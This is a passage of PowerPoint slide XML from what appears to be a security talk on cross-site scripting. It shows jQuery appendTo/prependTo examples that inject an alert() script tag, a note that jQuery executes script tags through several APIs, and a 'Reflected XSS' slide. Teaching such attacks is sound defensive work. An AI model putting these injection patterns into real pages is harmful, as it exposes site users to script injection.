                <a:t>$('&lt;script&gt;alert("Hi!");&lt;/script&gt;').</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>appendTo</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>('#</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>myDiv</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>');</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr marL="182880" indent="-457200">
                <a:lnSpc>
                  <a:spcPct val="110000"/>
                </a:lnSpc>
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="600"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" sz="1600">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>$('&lt;script&gt;alert("Hi!");&lt;/script&gt;').</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>prependTo</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>('#</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" err="1">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>myDiv</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600">
                  <a:solidFill>
                    <a:schemeClr val="tx1"/>
                  </a:solidFill>
                  <a:latin typeface="Courier"/>
                  <a:cs typeface="Courier"/>
                </a:rPr>
                <a:t>');</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1367894"/>
            <a:ext cx="8229052" cy="707886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="4572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err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jQuery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> will evaluate &lt;script&gt; tags and execute</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>script in a variety of API’s</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="10" name="Group 9"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6997754" y="397058"/>
            <a:ext cx="1465134" cy="1484240"/>
            <a:chOff x="6835420" y="616218"/>
            <a:chExt cx="1465134" cy="1484240"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="11" name="Group 10"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="6835420" y="635329"/>
              <a:ext cx="1465134" cy="1465129"/>
              <a:chOff x="3285453" y="1431558"/>
              <a:chExt cx="1465134" cy="1465129"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="13" name="Oval 12"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3285453" y="1431558"/>
                <a:ext cx="1465134" cy="1465129"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ln w="38100" cmpd="sng">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p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3373277" y="1519470"/>
                <a:ext cx="1289487" cy="1289304"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="DB3D16"/>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12" name="TextBox 11"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7327992" y="616218"/>
              <a:ext cx="475132" cy="1477328"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr"/>
              <a:r>
                <a:rPr lang="en-US" sz="9600" b="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                </a:rPr>
                <a:t>!</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="34" name="Rectangle 33"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="5019683"/>
            <a:ext cx="8229600" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tech.blog.box.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/2013/08/securing-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>jquery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>-against-unintended-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" err="1">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="7A6C62"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/ </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="480952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37"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900" decel="100000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="3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bwMode="gray">
          <a:xfrm flipV="1">
            <a:off x="2995590" y="1991786"/>
            <a:ext cx="1187785" cy="1879176"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="accent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Reflected XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{9B76E54B-5BBA-9541-9CDA-30D09F65C9FC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>9</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="Group 14"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2893981" y="4000038"/>
            <a:ext cx="933457" cy="651198"/>
            <a:chOff x="5416743" y="3058586"/>
            <a:chExt cx="1211786" cy="1001811"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Rounded Rectangle 30"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5416878" y="3058586"/>
              <a:ext cx="1211651" cy="850916"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2469709" h="1620220">
                  <a:moveTo>
                    <a:pt x="256280" y="74060"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="185808" y="74060"/>
                    <a:pt x="128680" y="131188"/>
                    <a:pt x="128680" y="201660"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="128680" y="1427773"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="128680" y="1498245"/>
                    <a:pt x="185808" y="1555373"/>
                    <a:pt x="256280" y="1555373"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2214877" y="1555373"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2285349" y="1555373"/>
                    <a:pt x="2342477" y="1498245"/>
                    <a:pt x="2342477" y="1427773"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2342477" y="201660"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2342477" y="131188"/>
                    <a:pt x="2285349" y="74060"/>
                    <a:pt x="2214877" y="74060"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="139566" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2330143" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2407223" y="0"/>
                    <a:pt x="2469709" y="62486"/>
                    <a:pt x="2469709" y="139566"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="2469709" y="1480654"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="2469709" y="1557734"/>
                    <a:pt x="2407223" y="1620220"/>
                    <a:pt x="2330143" y="1620220"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="139566" y="1620220"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="62486" y="1620220"/>
                    <a:pt x="0" y="1557734"/>
                    <a:pt x="0" y="1480654"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="139566"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="62486"/>
                    <a:pt x="62486" y="0"/>
                    <a:pt x="1395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sp>
          <p:nvSpPr>
            <p:cNvPr id="17" name="Rounded Rectangle 60"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5416743" y="3975822"/>
              <a:ext cx="1211786" cy="84575"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 53749 w 1211650"/>
                <a:gd name="connsiteY0" fmla="*/ 3175 h 113397"/>
                <a:gd name="connsiteX1" fmla="*/ 517796 w 1211650"/>
                <a:gd name="connsiteY1" fmla="*/ 3175 h 113397"/>
                <a:gd name="connsiteX2" fmla="*/ 513351 w 1211650"/>
                <a:gd name="connsiteY2" fmla="*/ 7620 h 113397"/>
                <a:gd name="connsiteX3" fmla="*/ 513351 w 1211650"/>
                <a:gd name="connsiteY3" fmla="*/ 38099 h 113397"/>
                <a:gd name="connsiteX4" fmla="*/ 520971 w 1211650"/>
                <a:gd name="connsiteY4" fmla="*/ 45719 h 113397"/>
                <a:gd name="connsiteX5" fmla="*/ 684803 w 1211650"/>
                <a:gd name="connsiteY5" fmla="*/ 45719 h 113397"/>
                <a:gd name="connsiteX6" fmla="*/ 692423 w 1211650"/>
                <a:gd name="connsiteY6" fmla="*/ 38099 h 113397"/>
                <a:gd name="connsiteX7" fmla="*/ 692423 w 1211650"/>
                <a:gd name="connsiteY7" fmla="*/ 7620 h 113397"/>
                <a:gd name="connsiteX8" fmla="*/ 687978 w 1211650"/>
                <a:gd name="connsiteY8" fmla="*/ 3175 h 113397"/>
                <a:gd name="connsiteX9" fmla="*/ 1157901 w 1211650"/>
                <a:gd name="connsiteY9" fmla="*/ 3175 h 113397"/>
                <a:gd name="connsiteX10" fmla="*/ 1211650 w 1211650"/>
                <a:gd name="connsiteY10" fmla="*/ 56924 h 113397"/>
                <a:gd name="connsiteX11" fmla="*/ 1211650 w 1211650"/>
                <a:gd name="connsiteY11" fmla="*/ 59648 h 113397"/>
                <a:gd name="connsiteX12" fmla="*/ 1157901 w 1211650"/>
                <a:gd name="connsiteY12" fmla="*/ 113397 h 113397"/>
                <a:gd name="connsiteX13" fmla="*/ 53749 w 1211650"/>
                <a:gd name="connsiteY13" fmla="*/ 113397 h 113397"/>
                <a:gd name="connsiteX14" fmla="*/ 0 w 1211650"/>
                <a:gd name="connsiteY14" fmla="*/ 59648 h 113397"/>
                <a:gd name="connsiteX15" fmla="*/ 0 w 1211650"/>
                <a:gd name="connsiteY15" fmla="*/ 56924 h 113397"/>
                <a:gd name="connsiteX16" fmla="*/ 53749 w 1211650"/>
                <a:gd name="connsiteY16" fmla="*/ 3175 h 113397"/>
                <a:gd name="connsiteX17" fmla="*/ 520971 w 1211650"/>
                <a:gd name="connsiteY17" fmla="*/ 0 h 113397"/>
                <a:gd name="connsiteX18" fmla="*/ 687978 w 1211650"/>
                <a:gd name="connsiteY18" fmla="*/ 3175 h 113397"/>
                <a:gd name="connsiteX19" fmla="*/ 517796 w 1211650"/>
                <a:gd name="connsiteY19" fmla="*/ 3175 h 113397"/>
                <a:gd name="connsiteX20" fmla="*/ 520971 w 1211650"/>
                <a:gd name="connsiteY20" fmla="*/ 0 h 113397"/>
                <a:gd name="connsiteX0" fmla="*/ 53749 w 1211650"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 110222"/>
                <a:gd name="connsiteX1" fmla="*/ 517796 w 1211650"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 110222"/>
                <a:gd name="connsiteX2" fmla="*/ 513351 w 1211650"/>
                <a:gd name="connsiteY2" fmla="*/ 4445 h 110222"/>
                <a:gd name="connsiteX3" fmla="*/ 513351 w 1211650"/>
                <a:gd name="connsiteY3" fmla="*/ 34924 h 110222"/>
                <a:gd name="connsiteX4" fmla="*/ 520971 w 1211650"/>
                <a:gd name="connsiteY4" fmla="*/ 42544 h 110222"/>
                <a:gd name="connsiteX5" fmla="*/ 684803 w 1211650"/>
                <a:gd name="connsiteY5" fmla="*/ 42544 h 110222"/>
                <a:gd name="connsiteX6" fmla="*/ 692423 w 1211650"/>
                <a:gd name="connsiteY6" fmla="*/ 34924 h 110222"/>
                <a:gd name="connsiteX7" fmla="*/ 692423 w 1211650"/>
                <a:gd name="connsiteY7" fmla="*/ 4445 h 110222"/>
                <a:gd name="connsiteX8" fmla="*/ 687978 w 1211650"/>
                <a:gd name="connsiteY8" fmla="*/ 0 h 110222"/>
                <a:gd name="connsiteX9" fmla="*/ 1157901 w 1211650"/>
                <a:gd name="connsiteY9" fmla="*/ 0 h 110222"/>
                <a:gd name="connsiteX10" fmla="*/ 1211650 w 1211650"/>
                <a:gd name="connsiteY10" fmla="*/ 53749 h 110222"/>
                <a:gd name="connsiteX11" fmla="*/ 1211650 w 1211650"/>
                <a:gd name="connsiteY11" fmla="*/ 56473 h 110222"/>
                <a:gd name="connsiteX12" fmla="*/ 1157901 w 1211650"/>
                <a:gd name="connsiteY12" fmla="*/ 110222 h 110222"/>
                <a:gd name="connsiteX13" fmla="*/ 53749 w 1211650"/>
                <a:gd name="connsiteY13" fmla="*/ 110222 h 110222"/>
                <a:gd name="connsiteX14" fmla="*/ 0 w 1211650"/>
                <a:gd name="connsiteY14" fmla="*/ 56473 h 110222"/>
                <a:gd name="connsiteX15" fmla="*/ 0 w 1211650"/>
                <a:gd name="connsiteY15" fmla="*/ 53749 h 110222"/>
                <a:gd name="connsiteX16" fmla="*/ 53749 w 1211650"/>
                <a:gd name="connsiteY16" fmla="*/ 0 h 110222"/>
                <a:gd name="connsiteX17" fmla="*/ 517796 w 1211650"/>
                <a:gd name="connsiteY17" fmla="*/ 0 h 110222"/>
                <a:gd name="connsiteX18" fmla="*/ 687978 w 1211650"/>
                <a:gd name="connsiteY18" fmla="*/ 0 h 110222"/>
                <a:gd name="connsiteX19" fmla="*/ 517796 w 1211650"/>
                <a:gd name="connsiteY19" fmla="*/ 0 h 110222"/>
                <a:gd name="connsiteX0" fmla="*/ 53749 w 1211650"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 110222"/>
                <a:gd name="connsiteX1" fmla="*/ 517796 w 1211650"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 110222"/>
                <a:gd name="connsiteX2" fmla="*/ 513351 w 1211650"/>
                <a:gd name="connsiteY2" fmla="*/ 4445 h 110222"/>
                <a:gd name="connsiteX3" fmla="*/ 513351 w 1211650"/>
                <a:gd name="connsiteY3" fmla="*/ 34924 h 110222"/>
                <a:gd name="connsiteX4" fmla="*/ 520971 w 1211650"/>
                <a:gd name="connsiteY4" fmla="*/ 42544 h 110222"/>
                <a:gd name="connsiteX5" fmla="*/ 684803 w 1211650"/>
                <a:gd name="connsiteY5" fmla="*/ 42544 h 110222"/>
                <a:gd name="connsiteX6" fmla="*/ 692423 w 1211650"/>
                <a:gd name="connsiteY6" fmla="*/ 34924 h 110222"/>
                <a:gd name="connsiteX7" fmla="*/ 692423 w 1211650"/>
                <a:gd name="connsiteY7" fmla="*/ 4445 h 110222"/>
                <a:gd name="connsiteX8" fmla="*/ 687978 w 1211650"/>
                <a:gd name="connsiteY8" fmla="*/ 0 h 110222"/>
                <a:gd name="connsiteX9" fmla="*/ 1157901 w 1211650"/>
                <a:gd name="connsiteY9" fmla="*/ 0 h 110222"/>
                <a:gd name="connsiteX10" fmla="*/ 1211650 w 1211650"/>
                <a:gd name="connsiteY10" fmla="*/ 53749 h 110222"/>
                <a:gd name="connsiteX11" fmla="*/ 1211650 w 1211650"/>
                <a:gd name="connsiteY11" fmla="*/ 56473 h 110222"/>
                <a:gd name="connsiteX12" fmla="*/ 1157901 w 1211650"/>
                <a:gd name="connsiteY12" fmla="*/ 110222 h 110222"/>
                <a:gd name="connsiteX13" fmla="*/ 53749 w 1211650"/>
                <a:gd name="connsiteY13" fmla="*/ 110222 h 110222"/>
                <a:gd name="connsiteX14" fmla="*/ 0 w 1211650"/>
                <a:gd name="connsiteY14" fmla="*/ 56473 h 110222"/>
                <a:gd name="connsiteX15" fmla="*/ 0 w 1211650"/>
                <a:gd name="connsiteY15" fmla="*/ 53749 h 110222"/>
                <a:gd name="connsiteX16" fmla="*/ 53749 w 1211650"/>
                <a:gd name="connsiteY16" fmla="*/ 0 h 11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1650" h="110222">
                  <a:moveTo>
                    <a:pt x="53749" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="517796" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="513351" y="4445"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="513351" y="34924"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="513351" y="39132"/>
                    <a:pt x="516763" y="42544"/>
                    <a:pt x="520971" y="42544"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="684803" y="42544"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="689011" y="42544"/>
                    <a:pt x="692423" y="39132"/>
                    <a:pt x="692423" y="34924"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="692423" y="4445"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="687978" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1157901" y="0"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1187586" y="0"/>
                    <a:pt x="1211650" y="24064"/>
                    <a:pt x="1211650" y="53749"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1211650" y="56473"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="1211650" y="86158"/>
                    <a:pt x="1187586" y="110222"/>
                    <a:pt x="1157901" y="110222"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="53749" y="110222"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="24064" y="110222"/>
                    <a:pt x="0" y="86158"/>
                    <a:pt x="0" y="56473"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="53749"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="24064"/>
                    <a:pt x="24064" y="0"/>
                    <a:pt x="537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a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Freeform 26"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6407630" y="3870962"/>
            <a:ext cx="537768" cy="1063472"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 0 w 1375"/>
              <a:gd name="T1" fmla="*/ 0 h 2720"/>
              <a:gd name="T2" fmla="*/ 0 w 1375"/>
              <a:gd name="T3" fmla="*/ 0 h 2720"/>
              <a:gd name="T4" fmla="*/ 1374 w 1375"/>
              <a:gd name="T5" fmla="*/ 0 h 2720"/>
              <a:gd name="T6" fmla="*/ 1374 w 1375"/>
              <a:gd name="T7" fmla="*/ 2719 h 2720"/>
              <a:gd name="T8" fmla="*/ 0 w 1375"/>
              <a:gd name="T9" fmla="*/ 2719 h 2720"/>
              <a:gd name="T10" fmla="*/ 0 w 1375"/>
              <a:gd name="T11" fmla="*/ 0 h 2720"/>
              <a:gd name="T12" fmla="*/ 157 w 1375"/>
              <a:gd name="T13" fmla="*/ 2094 h 2720"/>
              <a:gd name="T14" fmla="*/ 157 w 1375"/>
              <a:gd name="T15" fmla="*/ 2094 h 2720"/>
              <a:gd name="T16" fmla="*/ 157 w 1375"/>
              <a:gd name="T17" fmla="*/ 2188 h 2720"/>
              <a:gd name="T18" fmla="*/ 1218 w 1375"/>
              <a:gd name="T19" fmla="*/ 2188 h 2720"/>
              <a:gd name="T20" fmla="*/ 1218 w 1375"/>
              <a:gd name="T21" fmla="*/ 2094 h 2720"/>
              <a:gd name="T22" fmla="*/ 157 w 1375"/>
              <a:gd name="T23" fmla="*/ 2094 h 2720"/>
              <a:gd name="T24" fmla="*/ 157 w 1375"/>
              <a:gd name="T25" fmla="*/ 156 h 2720"/>
              <a:gd name="T26" fmla="*/ 157 w 1375"/>
              <a:gd name="T27" fmla="*/ 156 h 2720"/>
              <a:gd name="T28" fmla="*/ 157 w 1375"/>
              <a:gd name="T29" fmla="*/ 250 h 2720"/>
              <a:gd name="T30" fmla="*/ 1218 w 1375"/>
              <a:gd name="T31" fmla="*/ 250 h 2720"/>
              <a:gd name="T32" fmla="*/ 1218 w 1375"/>
              <a:gd name="T33" fmla="*/ 156 h 2720"/>
              <a:gd name="T34" fmla="*/ 157 w 1375"/>
              <a:gd name="T35" fmla="*/ 156 h 2720"/>
              <a:gd name="T36" fmla="*/ 157 w 1375"/>
              <a:gd name="T37" fmla="*/ 2250 h 2720"/>
              <a:gd name="T38" fmla="*/ 157 w 1375"/>
              <a:gd name="T39" fmla="*/ 2250 h 2720"/>
              <a:gd name="T40" fmla="*/ 157 w 1375"/>
              <a:gd name="T41" fmla="*/ 2344 h 2720"/>
              <a:gd name="T42" fmla="*/ 1218 w 1375"/>
              <a:gd name="T43" fmla="*/ 2344 h 2720"/>
              <a:gd name="T44" fmla="*/ 1218 w 1375"/>
              <a:gd name="T45" fmla="*/ 2250 h 2720"/>
              <a:gd name="T46" fmla="*/ 157 w 1375"/>
              <a:gd name="T47" fmla="*/ 2250 h 2720"/>
              <a:gd name="T48" fmla="*/ 157 w 1375"/>
              <a:gd name="T49" fmla="*/ 2406 h 2720"/>
              <a:gd name="T50" fmla="*/ 157 w 1375"/>
              <a:gd name="T51" fmla="*/ 2406 h 2720"/>
              <a:gd name="T52" fmla="*/ 157 w 1375"/>
              <a:gd name="T53" fmla="*/ 2500 h 2720"/>
              <a:gd name="T54" fmla="*/ 1218 w 1375"/>
              <a:gd name="T55" fmla="*/ 2500 h 2720"/>
              <a:gd name="T56" fmla="*/ 1218 w 1375"/>
              <a:gd name="T57" fmla="*/ 2406 h 2720"/>
              <a:gd name="T58" fmla="*/ 157 w 1375"/>
              <a:gd name="T59" fmla="*/ 2406 h 2720"/>
              <a:gd name="T60" fmla="*/ 624 w 1375"/>
              <a:gd name="T61" fmla="*/ 469 h 2720"/>
              <a:gd name="T62" fmla="*/ 624 w 1375"/>
              <a:gd name="T63" fmla="*/ 469 h 2720"/>
              <a:gd name="T64" fmla="*/ 687 w 1375"/>
              <a:gd name="T65" fmla="*/ 531 h 2720"/>
              <a:gd name="T66" fmla="*/ 749 w 1375"/>
              <a:gd name="T67" fmla="*/ 469 h 2720"/>
              <a:gd name="T68" fmla="*/ 687 w 1375"/>
              <a:gd name="T69" fmla="*/ 406 h 2720"/>
              <a:gd name="T70" fmla="*/ 624 w 1375"/>
              <a:gd name="T71" fmla="*/ 46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75" h="2720">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="1374" y="0"/>
                  <a:pt x="1374" y="0"/>
                  <a:pt x="1374" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="1374" y="2719"/>
                  <a:pt x="1374" y="2719"/>
                  <a:pt x="1374" y="2719"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="2719"/>
                  <a:pt x="0" y="2719"/>
                  <a:pt x="0" y="2719"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="0" y="0"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="157" y="2094"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="157" y="2094"/>
                </a:lnTo>
                <a:cubicBezTo>
